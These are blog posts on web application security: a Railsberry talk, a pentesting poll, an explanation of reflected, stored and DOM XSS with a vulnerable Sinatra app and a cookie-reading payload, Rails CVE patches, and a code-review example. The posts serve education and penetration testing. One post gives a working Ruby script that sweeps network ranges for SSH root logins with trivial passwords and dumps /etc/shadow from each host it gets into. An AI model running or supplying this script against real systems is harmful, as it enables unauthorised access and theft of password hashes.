However, talk was good afterall. Everything went well. Nothing broke during exposure, none of the people were harmed during the talk, no customer ewb applications were broken Internet is still working ( I guess ).

A particular mention to…

Felix Geisendoerfer gave us today an oustanding talk about to make an http://nodecopter.com/ to fly controlled by javascript or any other programming language.

Kudos to https://twitter.com/felixge for his hacks and for great talk.

My slides and the videos

The code you need to play against a web application is:

1
2
3
4

$ gem install ciphersurfer
$ gem install gengiscan
$ gem install codesake_links
$ gem install cross

Soon cross, gengiscan and ciphersurfer will but under the codesake project and eventually it will integrate into the dusk tool (repository is not created).

dawn code review tool is going to be soon updated with testing for CVE-2013-1800.

The idea is that both dusk and dawn will be the core engines behind codesake.com application security startup, but it’s quite early to talk about it. The thing to remember is that the security engines will be opensource, ever.

So, I hope you enjoyed the talk. In case you missed, because you were not there, here is my slides:

With demo videos too.

Railsberry 2013 - Navigating the attack target after the information gathering stage

Railsberry 2013 - First XSS spotted in the wild

Railsberry 2013 - Information gathering

Railsberry 2013 - Bruteforce users login name

Railsberry 2013 - Find reflected XSS with cross

If you have any questions, comments or criticisms please use my ask me anything box on github.

Enjoy it!

It was about experiment and embracing the change. A lot of times in my life I do experienced the need of change. Setting small goals and run yourself against status quo is a great living lesson.

For the technical talks I really loved Eric Redmond one about distributed programming patterns. Truly awesome.

It deserves a mention also the latest talk from Joseph Wilk about artificial intelligence and how computer science it can be used in some amazing fields like music and arts.

Joseph showed his researches in artificial intelligence while creating Haiku poems. Outstanding results. You really want to learn more about it.

And tomorrow it will be mine turn.

Finger crossed to myself.

It’s a sunny sunday afternoon here in Cracow and I’m on my hotel room writing this post. This night was almost sleepless so I had the need to recover a bit.

In Poland for the second time

It’s fun. When I arrived at the hotel I didn’t remember anything about my last stay for the Owasp European Conference in 2009. I crossed the street (Dietla), leaving the Jewish district on my back and I thought to myself “hey, wait I minute but I remember this place” and than I started remembering all the place where me, _ikki, Matteo, Giorgio and Stefano was and how much we enjoyed… lovely memories.

Train tripper

While crossing from the city center to the Jewish district I visited from the outside conference venue… there were some applicake guys I supposed preparing the stage.

Tomorrow it will be conference day number 1. Great talks and hopefully great networking altogether.

Close to the venue there was a museum about the history of engineering in Poland, there were cars and buses evolution and some very fun playground with games for kids.

It would be great having also my wife and my kids here. Maybe next time.

I asked “Why you don’t make any web application penetration test when I deploy a new web application (or a new feature)?”

I collected 41 answers after advertise the poll on linkedin, facebook and on twitter.

I asked also the Italian Ruby mailinglist that is full of great ruby specialist, startuppers and makers.

Let’s analyse the results

Slightly intended to turn on provocation

You noticed right, I’m a provoker. I eventually could asked Do you test your application for security issues before deploy it? to let people say easily Yes we do make a lot of tests but in my experience (I’ll be always be happy in being contradicted) the percentage of people applying security tests to web code is poor.

Sorry to be so dramatic, but it’s quite true that most of people in small and medium business don’t care about security (or test overall).

People in large business… well, they don’t care too but this poll wasn’t answered by those kind of guys.

If all people eventually make security test over their code, this blog won’t be useful anymore isn’t it?!?

Results

Other answers

On the poll there was also an open answer box where people can leave their own answer if non of the above fitted.

No the application is deployed on Windows Server which is already secure

Our managers don’t care about that… sigh.

I approach security from the development side (static analysis, code reviews
etc) and don’t expect later pentests lead by the same dev team to improve
security, but I do run automated tools which have proved useless over time.

I don’t have enough time and money to invest in these. Is it possible to automate them?

It’s a mix of “No time.”/”No Budget” and another one you’ve not specified: “No
knowledge” :-) Usually, we don’t have the necessary knowledge to perform an
efficient pen test session and in order to obtain that knowledge we should
invest a too high amount of time. I know it’s a vicious circle that in the long
run doesn’t pay very well :-)

No time. We are missing our deadlines. We don’t have time to spent in security
tests. We know what pentest is but we consciously decide to skip it. And pray
that no skilled hacker will ever turn his eyes to us.

I wouldn’t know how to perform penetration tests. But I would like to know more about them.

My comments

Looking at the poll results I can see a good number of people (24%) that they run application security tests (their own or asking a freelance to do that). So, as average 2 out of 10 web applications out there are tested for security.

Other 8 out of 10 are not tested for security issues and the main reason is that people have no budget. But, how does it cost a good web application penetration test? And how much is it compared to the hidden costs of rewriting the app from scratch or monkey patching it after a SQL injection?

Even more, how much is it compared on your brand damage and all che costs related to a data loss after a security break-in? If you would experience a security issues, your competitors can take a competitive gain over you. You will potentially lose customers. Are you sure that you can really efford this risk?

It’s like designing a brand new car. You pay designers and engineers to create a super car with great design and outstanding performances. You car is great and intended to choosy customers who want to pay large amount of money for a good service. But when you design the car you don’t have enough budget to implement a full ABS plus stability control system, so you will not implement a top solution and your car fails on the market.

Application security is your breaking system. You must take care of it if you want to build a top class product. If you don’t, may be is a good product until someone (for not a predictable reason) will break into it, steal your customers data and make your business to fail.

For people who don’t care, well maybe they are even not reading this blog or they don’t care about IT security at all. I discourage people from ignore the IT security issue… in case of break-in your business or your online presence can be seriously compromised.

Open answers open two different points:

• I’m not skilled enough / I don’t have enough time to do also application security. Good, and that’s why there are application security specialists you can engage to help you in security tests. For the costs issues, ask a quote before and then evaluate if the money you will save can deal against the money you will lose if successfully attacked.
• Automated penetration tests. For sure you can. There are commercial tools out there and there will be codesake.com soon to ask for application security tests. I strongly encourage you also to do some manual tests since a tool can make a 100% coverage of your application no matter how good it is. It’s a clever idea to have an application security specialist to integrate tools with some manual check.

And you? What do you think about this topic? Which are your experience?

Do you make web application penetration test when you deploy a new web application or a new functionality?

If not, why you don’t introduce application security in your daily workflow? Tell me yours.

It will last until slide number 4 when I will recall that all the attack stuff I will show during the speech are not intended to be used by offense.

Point of singularity

Last time I had a public talk was last june for Italian Ruby Day and I finished slides during the talk right before mine.

In the past I delivered talks for Owasp events in Milan, Ghent, New York city and Cracow too and I finished slides the same day of the talk or the evening right before.

For sikurezza.org I delivered talks in Milan and Padua for SMAU and a very good technical conference called WebbIT (now disappeared) and the same… slides were never ready in time.

I’m scared… for upcoming railsberry 2013 talk slides are ready and video with attack demos too. (I lied… I had to find a pretty decent Dr. Evil image in HD for slide number 5 when I will recall to all outstanding developers in the room that they have to turn themselves in attackers for awhile)

Some stats

40 slides… for a 30 minutes long talk. Not all of them has content, some are titles or section separators so I can play well being in 2 minutes per slide in average.

I’ve got 8 slides with ruby code and three videos showing how do I use this ruby code I wrote in real world attacks under a broken web application I wrote for this conference. The broken web application is already available on my github.

What I will be talk about

The broken web application is build with three security flaws in mind:

• the authentication mechanism gives too much information to the user failing the login. It says that it doesn’t know the user if it’s not found in the database and it gives a different error message if a valid user mispelled the password. I will show how to exploit it enumerating good user of that application. Please note: you do need know a valid username to try guessing (because you have to simulate a good user that mispells the password. Owasp testing guide test for bruteforce attack is OWASP-AT-004
• the /hello API take a name parameter saying hello to the user not filtering the input… so it’s vulnerable to a reflected cross site scripting. The /login API too is vulnerable to reflected cross site scripting since it uses the login name the user just submitted as output without filtering. I’ll show how to exploit those two vulnerabilities. We will implement test OWASP-DV-001 as the latest Owasp Testing Guide.
• the robots.txt has some disallowed entries but one of them is missing some checks about preventing unauthenticated people to access it. I’ll show how to check for open URLs found in a robots.txt file with a single command. Owasp testing guide test is OWASP-IG-001 here.

Videos will be available on armoredcode youtube channel right after the event and slides will be available also too on slideshare and speakerdeck. Source code is almost already available on codesake github archive. I had to rebeand my previous released cross gem.

Enjoy it!

Starting from the blog, she wrote a book and eventually, this story becomes a film my and my wife watched it in TV yesterday.

Fact: nobody will use this blog to create a film script. But application security can be also very funny.

(yes, I’ll talk a little bit about security if you read more)

Appsec is like cooking: teach other people and use recipes

Yesterday I had an awareness session with a development team. We mostly talked about API and how to find the right balance between funciontality versus data security.

We talked about REST and CRUD approach when creating an API and how to use HTTP verbs effectively. Mastering an awareness session is the reason why an application security specialist must be also a developer.

Teaching is fun and I like talking about my passions.

Cooking involves also using recipes, eventually a chef can customize to best fit her personal taste. In the same way, secure coding involves the usage of code snippets (recipes) a developer (the chef) can customize to fit the software she’s creating.

At the end, we (application security specialists) are a sort of cooking book writers (like the Julia living in Paris back in ’40s). Our goal is to innovate how be effective in teaching other people how to deal with security bugs.

The great pretender(s)

Freddy Mercury sang about he was a great pretender, pretending he was doing well (since I’m not a music history expert I don’t know the topic Freddy was talking about here). That song is great and Freddy voice is unbelievable.

Also in application security scenario there is a lot of people pretending, me first, of doing well. We all aspire to be excellent, to be leaders in our field.

Take this blog. I’m aspiring this would be the reference in the application security field in the next three years. Setting ambitious goals is good. It forces you in go deep researching, learning and applying knowledge. It forces you in embrancing the change, and changing is always good since it kicks the status-quo out.

Embracing the change means also being prepared to make mistakes. Don’t be scared about saying “I wrote a sentence about a vulnerability but my conclusions are completely wrong”.

The very fundamental learning I had is that when I’m going to say something I need to verify it before and I must prove my claims. If I say that something is broken without proving it I’m facing the risk to say something completely wrong.

Go deep in learning, prove your sentences and go for the excellence.

Codesake.com and an apparent abuse of procrastination

If you look at the codesake.com web site, it seems the project is gone. No improvements, no github authentication, there’s nothing at the time.

The truth here is that I worked on the fundamentals before putting them on stage.

I created a set of codesake.com side projects that eventually would be the application security portal internals. And I decided all of them will go opensource, codesake users would pay for having them integrated in the website, glued with github account and for data mining and representation.

There is no reason to close security controls, it’s not black magic and everyone must know what I’m going to test over their code.

Railsberry: two weeks to go

In 22 and 23 of April I’ll be in Cracow for railsberry conference. From the agenda I realized my talk will last 30 minutes, this has some pros (mostly for the audience): they are not forced to listen me that much. However I’m forced to work on my talk schedule.

I guess it will be something like:

• introducing people to Owasp Top 10 2013 ( 5’ )
• show how to gather information to narrow an attack: robots.txt && CMS fingerprint ( 5’ )
• show how to spider a website and look for backup files ( 5’ )
• show how to bruteforce an authentication mechanism ( 5’ )
• show how to check for cross site scripting ( 5’ )
• show how to check a Rails application for CVE-2013-1855 and for CVE-2013-1857 and some basic for code reviewing ( 5’ )
• Q & A ( 5’ )
• Beer ( undisclosed but I saw a lot of parties in the schedule )

The goal, it’s useful to recall it, is to talk to developers about application security. And this evening there are three new security advisories for the Ruby on Rails MVC framework.

Is rails under attack?

Yesterday, @tenderlove reported 4 new security advisories for Ruby on Rails. Two of them are advisories about Cross site scripting vulnerabilities affecting sanitize helpers, therefore it’s critical to upgrade to the latest rails version.

• CVE-2013-1855 XSS vulnerability in sanitize_css in Action Pack
• CVE-2013-1857 XSS Vulnerability in the sanitize helper of Ruby on Rails

Tenderlove also gave some monkey patch to apply in case you can’t patch your rails installation.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

module HTML
  class WhiteListSanitizer
      # Sanitizes a block of css code. Used by #sanitize when it comes across a style attribute
    def sanitize_css(style)
      # disallow urls
      style = style.to_s.gsub(/url\s*\(\s*[^\s)]+?\s*\)\s*/, ' ')

      # gauntlet
      if style !~ /\A([:,;#%.\sa-zA-Z0-9!]|\w-\w|\'[\s\w]+\'|\"[\s\w]+\"|\([\d,\s]+\))*\z/ ||
          style !~ /\A(\s*[-\w]+\s*:\s*[^:;]*(;|$)\s*)*\z/
        return ''
      end

      clean = []
      style.scan(/([-\w]+)\s*:\s*([^:;]*)/) do |prop,val|
        if allowed_css_properties.include?(prop.downcase)
          clean <<  prop + ': ' + val + ';'
        elsif shorthand_css_properties.include?(prop.split('-')[0].downcase)
          unless val.split().any? do |keyword|
            !allowed_css_keywords.include?(keyword) &&
              keyword !~ /\A(#[0-9a-f]+|rgb\(\d+%?,\d*%?,?\d*%?\)?|\d{0,2}\.?\d{0,2}(cm|em|ex|in|mm|pc|pt|px|%|,|\))?)\z/
          end
            clean << prop + ': ' + val + ';'
          end
        end
      end
      clean.join(' ')
    end
  end
end

1
2
3
4
5
6
7
8
9
10

module HTML
    class WhiteListSanitizer
      self.protocol_separator = /:|(&#0*58)|(&#x70)|(&#x0*3a)|(%|%)3A/i

      def contains_bad_protocols?(attr_name, value)
        uri_attributes.include?(attr_name) &&
        (value =~ /(^[^\/:]*):|(&#0*58)|(&#x70)|(&#x0*3a)|(%|%)3A/i && !allowed_protocols.include?(value.split(protocol_separator).first.downcase.strip))
      end
    end
  end

True to be told, I see the high number of security issues for Rails as a symptom that the framework is gaining in popularity.

The cross site scripting menace

It’s one of the widespread security vulnerabilities affecting web applications nowadays. For the Owasp project is one of the most prevalent security risks for enterprises, in the 2010 it was the second item in their Top 10 and in the 2013 it’s going to be third in this security risks standing.

It looses a place but it’s far from being mitigated.

The idea behind cross site scripting it’s easy. A web application is vulnerable
if it takes an input (either from a web form or from HTTP request) and it uses
it without proper validation or escape.

There are three different type of cross site scripting (aka XSS) attacks:

• reflected
• stored
• DOM based

Reflected cross site scripting

A reflected cross site scripting occurs when a web application consumes a user input using it in one of its pages. A common scenario is a search result page when the search key is echoed to recall the user about his choice.

Following there is a Sinatra web application that takes a parameter from the URL and it uses in the view to say hello to the user. Of course this application is far from being something to be used in production but it can be used to exploit a reflected XSS.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

require 'sinatra'

get '/' do
  @name = params[:name]
  erb :index
end

__END__

@@index 

<!DOCTYPE html>

<html>
  <head>
    <meta charset="UTF-8">
    <title>XSS test</title> 
  </head>
  <body> 
    <h1>Worked!</h1>
    <p>
      Hello <%= @name %>
    </p>
  </body> 
</html>

Using with a regular string, this is the output we expect.

Since we trust user inputs (and this is a typical habit in software development) if the name parameter is filled with this piece of js

<script>alert(‘xss’)</script>

then the resulting HTML will be

1
2
3
4
5
6

  <body>
    <h1>Worked!</h1>
    <p>
      Hello <script>alert('xss')</script>
    </p>
  </body>

Browser doesn’t know it should receive a user name with an hello message. It takes this piece of HTML and it renders it with the following result:

In order to understand how dangerous it can be a reflected cross site scripting, look at this scenario:

• a web site is vulnerable to reflected XSS
• an attacker designs a well crafted phishing email exploiting the XSS in a email link
• the attack pattern is a redirect to an attacker controlled website with a web page reading all cookies
• the user is redirected back to the vulnerable web site

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

function get_cookies_array() {

    var cookies = { };

    if (document.cookie && document.cookie != '') {
        var split = document.cookie.split(';');
        for (var i = 0; i < split.length; i++) {
            var name_value = split[i].split("=");
            name_value[0] = name_value[0].replace(/^ /, '');
            cookies[decodeURIComponent(name_value[0])] = decodeURIComponent(name_value[1]);
        }
    }

    return cookies;

}

Stored cross site scripting

Stored cross site scriptings occur when a vulnerable web application stores user input in a database or a file for a further usage.

In a past web application penetration test, with a source code review, I found this:

• a web application exposes a page for user feedback with a textarea html element in it
• web application saves users’ feedback in the database without filtering or sanitize them
• an internal web application read that database for datamining activities

It was possible to submit, as fake feedback, a cross site scripting pattern attack that is eventually stored in the database. When the second web application (that is not Internet exposed) reads that database trying to build a table with users’ feedback, the pattern is used and the attack exploited.

That’s a stored cross site scripting in brief.

DOM Based cross site scripting

A DOM based xss attack occurs when the attack payload is executed by modifiying the DOM document in the victim browser using an attack pattern executed client side.

Richer user interfaces perform a lot of task client side, using parameters to build forms or mask or populate values without passing such parameters to the application server. This is done to save some traffic request and achieve better performances.

If DOM is updated without filtering the values read by the user, then it’s possible to inject arbitrary javascript code that it will be executed client side. Bear in mind that since no code is passed to the server, it’s unlikely that a web application firewall will save you from this kind of attack.

Happy birthday armoredcode.com

In this first year of blogging:

• 24.701 people visited this site - unique visitors
• 74,74% visitors were English speaking people. Only 2.85% used their browser with Italian locale
• USA with the 26,37% of visits is the country that loves more armoredcode.com followed by Italy (10.04%).
• Very few of my visitors use Internet Explorer (4.11%) but we’ve a lot of Windows visitors out of there (44.93%

To all of you… thank you very much

Trying to make people aware about security risks they occur writing unsafe code, will make yourself a friend or foe?

The harsh part of the story

Fact: software (most of it) is not secure and neither servers’ daemons nor servers’ configuration is focused on security.

Fact: small teams (startups, small web agencies) actually do have developers super stars. Some of them knows something about appsec but the time and the market are their enemies. No time and no budget for security tests.

Fact: large teams (corporate) may have some skilled developers. Security is seen as yet another compliance and boring test we are supposed to pass. If our code won’t pass security checks, we will rely on firewalls, we don’t want to spend our precious time in fixing the code for something is not a bug.

Fact: security costs. We assume you use a freelance application security expert to engage your web application. The tests will cost you money either in terms of freelance fee, than in terms of developers’ time to mitigate vulnerabilities.

Fact: ignoring security costs in your budget will expose you to larger costs to remediate a security breach in your database. Either in terms of fixing up the code, than in refunding hungry customers. You may want also to consider the costs you pay to build a trust relationship between you and your customers during the startup period.

5 facts to draw the application security perimeter. When you will deploy any awareness program into a big organization, you will fight at least those misconceptions. All of them are leading to a pure and cost saving concept: I don’t need security because it takes me money so I can ignore risks.

An hostile marketplace

Most of developers don’t trust security specialists. At least in Italy there is the strong misconception that an application security specialist is not able to code and that a developer is not able to understand security topics. Of course both of those sentences are wrong (with some remarkable exceptions I won’t discuss here) but the truth part is that finding a meeting point for those two worlds (development and security) is a compelling task.

As a startupper creating a trustworthy relationship with their customer, an application security specialist will be able to spend years in creating a realation ship with a development team. It must be honest, competent and giving the team something valuable to work over.

A security report saying “Fix this XSS because it’s security saying this” is useless. You have to carefully explain what’s wrong with that code and how to mitigate. They will be create software better than you will (most of times) but you have to start talking to developers using source code if you want to create a solid connection.

Creating awareness about security risks and make other people to trust you, it is a process taking years in order to be successful. In my experience, you will migrate from a not security aware development team to a Secure Software Development Lifecycle ready team in 5 or 6 years.

During this period you will:

• create secure coding guidelines and you will listen developers criticisms about them and you will iterate over and over
• make them pleased to ask you for a web application penetration test and for code reviews. You will provide valuable reports containing ideas not impositions
• meet developers and train them about secure coding and about new attacks

It’s impossible to complete this task without any programming background.

You can’t make code reviews or saying what’s wrong in other people code unless
you wrote code yourself as well. Every application security specialist must
write code and have worked with strict deadlines in order to understand how to
talk to developers.

Look at this very basic C snippet of code.

1
2
3
4
5
6
7
8
9

int fd;
char **buf = malloc(8192);

fd = open("myfile", O_RDWR);
// some instructions here
read(fd, buf, 8192);
// other instructions there

close(fd);

Imagine you never wrote a single line of C code in your life. How can your code review be useful in this scenario? Are you a good security specialist just because you ran rats?

In my opinion you must be honest and saying you can make code review only if you really can write it better:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

#include <sys/file.h>
#include <stdio.h>
#define BUF_SIZE 8192

int fd;
char **buf = malloc(BUF_SIZE);

fd = open("myfile", O_RDWR);
if (fd == -1) {
  perror("myapp");
  exit(-1);
}
if (flock(fd, LOCK_EX) == -1) {
  perror("myapp");
  exit(-1);
}

// you can now make something here without being worried about TOCTOU
// when you read... remember to leave a char for the end of line...
if (read(fd, buf, BUF_SIZE-1) == 1) {
  perror("myapp");
  exit(-1);
}

if (close(fd) == -1) {
  perror("myapp");
  exit(-1);
}

this example is taken from a real code review I made a couple of week ago. Developers actually don’t care about TOCTOU because the read call was too much call to the open to justify the lock… creating awareness is also force yourself not to laugh so hard.

Tell me your now

I need your voice now… I create a survey to ask people their position about web application penetration test. I will use as slide number 2 or 3 in my upcoming Railsberry 2013 talk.

Q: Why you don’t make any web application penetration test when I deploy a new web application (or a new feature)?

• You’re wrong. I do make a web application penetration test when I deploy a new web application or a new feature
• No budget. Security costs are too high for us, we’re a startup and we’re focused on business first
• No need to. We’re a big development team. Our code is robust and strong. We won’t occur in any security incident. Ever
• No time. We are missing our deadlines. We don’t have time to spent in security tests. We are safe from risks. We have firewalls.
• I don’t care. Seriously, security is a word spent by sales men to sell antivirus or similiar stuff. I don’t think my web application will be attacked by “so called” hackers.

What’s your positition? Do you ask a security guy to make a penetration test over your code?

Image curtesy by Glyn Freeman

I asked Jim to introduce himself.

Jim Manico is the VP of Security Architecture for WhiteHat
Security, a web security firm. He authors and delivers developer
security awareness training for WhiteHat Security and has a background
as a software developer and architect. Jim is also a global board member
for the OWASP foundation. He manages and participates in several OWASP
projects, including the OWASP cheat sheet series and the OWASP podcast
series.

This is a critical review about the cheatsheet. My concern, as well other venerable Owasp leaders, is to provide content that it can be consumed by developers rathern than only by security researchers with some coding skills.

The cheatsheet is authored by:

• Matt Konda - mkonda [at] jemurai.com
• Neil Matatall neil [at] matatall.com
• Ken Johnson cktricky [at] gmail.com
• Justin Collins justin [at] presidentbeef.com
• Jon Rose - jrose400 [at] gmail.com
• Lance Vaughn - lance [at] cabforward.com
• Jon Claudius - jonathan.claudius [at] gmail.com
• Aaron Bedra aaron [at] aaronbedra.com

Kudos for all those guys for their work and commitment.

The review

First of all, let me say one thing: the document Jim and other guys wrote is:

• clear
• with security in mind
• almost practical

This cheatsheet has very valuable content in it and you can use it, right now, to improve your Ruby on Rails secure coding workflow.

The KISS paradigm is applied to this document and every item is shortly described giving the reader the opportunity of going deeper with further investigations.

The first thing I found it would be better in terms of approach is that there is no a logical organization for the item described in the cheatsheet. It would better having them grouped by web application macro areas like authentication & authorization, input validation, error handling and stuff like that.

Command injection wrote this way it’s not a Rails specific issue. Of course the important bit is not to bind user controlled inputs to strings passed to the operating system as commands to be executed.

The part about authentication suggests about using Devise (and this is good) but in a cheatsheet there is no enough space to cover how to create an autentication mechanism using Devise. True to be told the code snippets provided are not enough for an early reader knowing nothing about implementing a good authentication mechanism. You may want to read a blog post I wrote in November about implementing an authentication mechanism for Padrino and omniauth It would be a better approach to grab a list of authentication frameworks, with pointers and blog posts, and give the reader some security tips for each of them.

For the forceful browsing section, an example about how to use cancan to enforce some authorization controls.

Finding business logic bugs is a tricky task, the most difficult in a web application penetration test. As a security tester one of your task is trying to subvert application business logic in order to have the target application to do whatever you would do. And the penetration test is missing from the key ways to protect your application from business logic flaws.

We love

• Upcoming Rails 4 is cited
• Rails is growing up as web framework and it’s great having security material to create awareness

We love less

• The overall document is for sure intented to be consumed by developers but it’s clear it has been written by security researchers
• Pointers to Owasp attack detailed description must be placed in order to create awareness about risks. My experience is that a developer is not trained to see security risk so he couldn’t understand at first glance why he should change his working code.
• Covers only ActiveRecord as ORM

Off by one

Of course, the authors work is valuable and it’s pretty easy to use this cheatsheet in everyday workflow as a reference. I’d like to see it improved with other Ruby powered web frameworks like Sinatra or Padrino and for other ORMs like Datamapper.

This cheatsheet it’s a draft as authors say in the web page, so I can’t wait to see any great improvements, hopefully more about upcoming Rails 4.

Scenario

You are pentesting your customer’s network. A lot of servers are answering to SSH protocol in order to allow remote management. No problem with this, of course you may want to deal with remote management also using some identity and access management product in order to centralize admin login and to have a truly random root password on each server.

There are some well known passwords every not-so-security-aware sysadmin would use to protect root account:

• God
• Sex
• Password
• root
• 12345
• 1q2w3e4r

I’m not jocking. They are still here. People still use weak passwords since they are quick to memorize and to type on the keyboard.

The funny bit here is that most of time is spent by root to be idle looking at the ls -l command output. Grin.

Do you need a very quick script to check for root default credentials? I’ll give you one I wrote and that I found useful in a lot of security assessments.

Implementation

What we need here is to connect to a given host on a given port using the SSH protocol. Our script must be flexible enough to accept an arbitrary host and also arbitrary ports. System administrators may have changed SSH default port to their server, so we would parameterize it instead of hardcoding “22” in our script. We need also a way to manage IP addresses notation, in order to scan whole networks without specifying every single host.

We’re lucky enough, all we need is on standard library. We just want to install the net-ssh ruby gem.

1

$ gem install net-ssh

Our script would read a config file for target SSH ports and trivial password to use. We won’t code an ssh bruteforcer, we just want to check if some hosts in the environment have very trivial password values for root account.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

require 'yaml'

...

def self.read_conf(conf_file=nil)

  (conf_file.nil?)? file='./ssh_takedown.yaml' : file=conf_file
  (File.exists?(file))? config = YAML.load_file(file) : config = {"config"=>{"ports_to_scan"=>"22", "password_list"=>"root,password"}}

  config
end

# A basic configuration file...
#
# config:
#  ports_to_scan:  "22,2022,3022"
#  password_list:  "God,sex,xxx,Password,root,12345,1q2w3e4r"

# ... and its usage...
#
# 1.9.3-p194 :009 > require 'yaml'
# => true 
# 1.9.3-p194 :010 > read_conf("./con.yaml")
# => {"config"=>{"ports_to_scan"=>"22,2022,3022", "password_list"=>"God,sex,xxx,Password,root,12345,1q2w3e4r"}} 
# 1.9.3-p194 :013 > ports = conf["config"]["ports_to_scan"].split(',')
# => ["22", "2022", "3022"] 

Starting from ruby 1.9 there is a great class in the standard library taking care of all the stuff about ip addresses. The idea here is to use this standard library class to manage how inputs in term of VLANs.

The to_range method helps us in create a list of single host IPAddr classes that can be used in a loop.

1
2
3
4
5

require 'ipaddr'

net = IPAddr.new("192.168.1.0/24")
net.to_range # => #<IPAddr: IPv4:192.168.1.0/255.255.255.0>..#<IPAddr: IPv4:192.168.1.255/255.255.255.0>
net.to_range.count # => 256

Our main class would take config values, splits the comma separated options and be ready for the takeover.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77

require 'ipaddr'
require 'net/ssh'

module Codesake
  module SSH
    class Takedown

      attr_reader :ports
      attr_reader :passwds
      attr_reader :target
      attr_reader :results

      def initialize(target, config)
        @ports = conf_to_ports(config)
        @passwds = conf_to_passwds(config)
        @target = target
      end

      def analyse
        @results = []


        @target.to_range.each do |host|
          @passwds.each do |pass|
            @ports.each do |port|
              @results << {:host=>host.to_s, :port=>port, :pass=>pass} if connect(host.to_s, port, pass)
            end
          end
        end
        @results
      end

      def takedown
        @results.each do |result|
          steal(result[:host], result[:port], result[:password])
        end
      end

      private

      def steal(host, port, password)
       begin
          ssh = Net::SSH.start(host, "root", {:password=>password, :port=>port, :timeout=>3})
          data = ssh.exec!("cat /etc/shadow")
          f_d = File.new(host+"_shadow", "w")
          f_d.write(data)
          f_d.close
          ssh.close
          ret = true
        rescue => e
          ret = false
        end
        ret
      end

      def connect(host, port, password)
        begin
          ssh = Net::SSH.start(host, "root", {:password=>password, :port=>port, :timeout=>3})
          ssh.close
          ret = true
        rescue => e
          ret = false
        end

      end

      def conf_to_ports(config)
        config["config"]["ports_to_scan"].split(',')
      end

      def conf_to_passwds(config)
        config["config"]["password_list"].split(',')
      end

    end
  end
end

Now you can glue pieces together.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

require 'yaml'
require 'ipaddr'

# defaulting values here
conf = Codesake::Config.read_conf
net = ARGV[0]

Kernel.exit(-1) if net.nil? or net.empty?

ips  =IPAddr.new(net)
engine = Codesale::SSH::Takedown.new(ips, conf)
results = engine.analyse

# steal /etc/shadow
engine.takedown

Now we can call this script specifying networks in the CIDR notation and having shadow files to be saved in the current directory.

Off by one

Security starts from protecting your hosts with strong passwords for super user account. Period. No matter how good is your web code, if you leave the main door opened, your data are compromised as well as your code is suffering by SQL Injections.

Now, an announcement. Next April I’ll talk at Railsberry 2013 on about using ruby in a deep web application penetration test. It would be a great conference and I’m very excited about being part of it. There will be a lot of great software engineer… I hope they’ll love some security rants :)

As a wise appsec guy I asked him something about how is going to protect customers’ data.

Something we have: a physical device

Lombardia, the Italian region around Milan, Bergamo, Brescia and so on, uses a smartcard and a centralized datacenter to make all doctors and hospital in its territory to share the health history for a given person.

The smartcard is bounded to each physical person and it is also the assigned code for fiscal related issues. This to say, that every person has a different code and then a different smartcard.

People, can ask a personal PIN to unlock data contained in the smartcard and either access to the centralized datacenter information about their medical history.

We consider it a strong and a secure system by now, it’s out of scope today. We just want to notice that Lombardia already has in production that guy’s idea execpt for the cloud part.

Something we don’t have: the cloud

Cloud… when I see this word in slideware I feel myself like after a strong kick on the stomach. Cloud is by definition a place somewhere on the Internet that we can threat as a huge mass storage system.

It’s not important neither the operating system, the database running or how many machines are running a particular service. It’s the cloud, baby.

gmail.com stores your email in the cloud. This means that they are physically stored somewhere in Mountain view Google datacenter, but also in India, Pakistan, Italy, France, Alaska… yes we can continue. gmail.com security relies on the security of the web application people use as frontend.

There is of course physical security and data would be ciphered but, we can’t make for sure that every single machine in google.com cloud has the same patchlevel, the same releases for software and database, the same hardware configuration, the same perimetral security (firewalls, web application firewalls, biometrical access to the server farm, password policy).

Mails are sensitive information but health data is even more. Out of scope by now all laws about privacy and data jurisdition that makes the idea illegal in most countries. We focus the discussion over the clous and its security level

An appsec guy would ask

I write my doubts in a polite and constructive way. I don’t want to kill other people ideas, but I can figure it out why on hell a person would be fine publishing on the Internet his health related sensitive data.

I asked which kind of security features would this startup proactive implement in order to secure those data. I asked which kind of vulnreability management policies they would adopt, which tool of vulnerability assessment they would use, which secure coding guidelines, how much often they would perform code reviews and similiar questions.

I putted in doubt that “in the cloud” was used there as buzzword just to describe something that it is supposed to be cool. Another guy, I suspect he owns a company providing cloud based services, said to me that “Vulnerability management” is either a buzzword and security would be the core business for the company providing cloud services for that startup.

No technical details. No further comments. Thread is dead from my point of view.

The key point is that cloud is a word spent during pre sales but you must take really care about how strong is your security policy when you put data in the cloud.

Vulnerability management is a process in place to take care about vulnerabilities and the risk level associated with them. I think it’s a real concern.

And you? What do you think about it? Is Vulnerability Management a buzz word?

photo courtesy by Wikipedia

But I did it.

CVE-2013 and CVE-2013 and a framework that has bugs

Looking at RoR community I may feel the sensation that people are comfortable their framework allows them to cook a web app in minutes, that it can give them helpers in order to write software the agile way and that is rock solid: robust and secure.

Please don’t misunderstand my point here. I do believe Rails is an outstanding framework with some advanced security features like:

• html_safe helpers to filter output
• automagically defense against basic SQL Injection patterns via ActiveRecord
• anti cross site request forgery token

But, like almost every piece of code written by human being, also Rails framework has bugs and, as consequence, even security ones.

Keeping underlying framework up-to-date is an critical activity a security engineer has to deal with nowadays. Updates must be:

• possible: you can listen a lot of stories about very customized legacy application that they cannot be update anymore since the developers are no longer available or since updating some library would break anything
• smooth: ideally your updating task would not be longer than a full day of work. If it is and your codebase is smaller then the Linux Kernel than you’re missing something

In order to achieve this you have to trust and use your underlying framework but you don’t want to became a slave of its features. This leads to a simple mantra I use everytime I talk to a developer about application security:

Choose a framework that is security aware but don’t rely on that. Your code
must handle and validate all inputs coming from HTTP request, filesystem,
database, whatever.

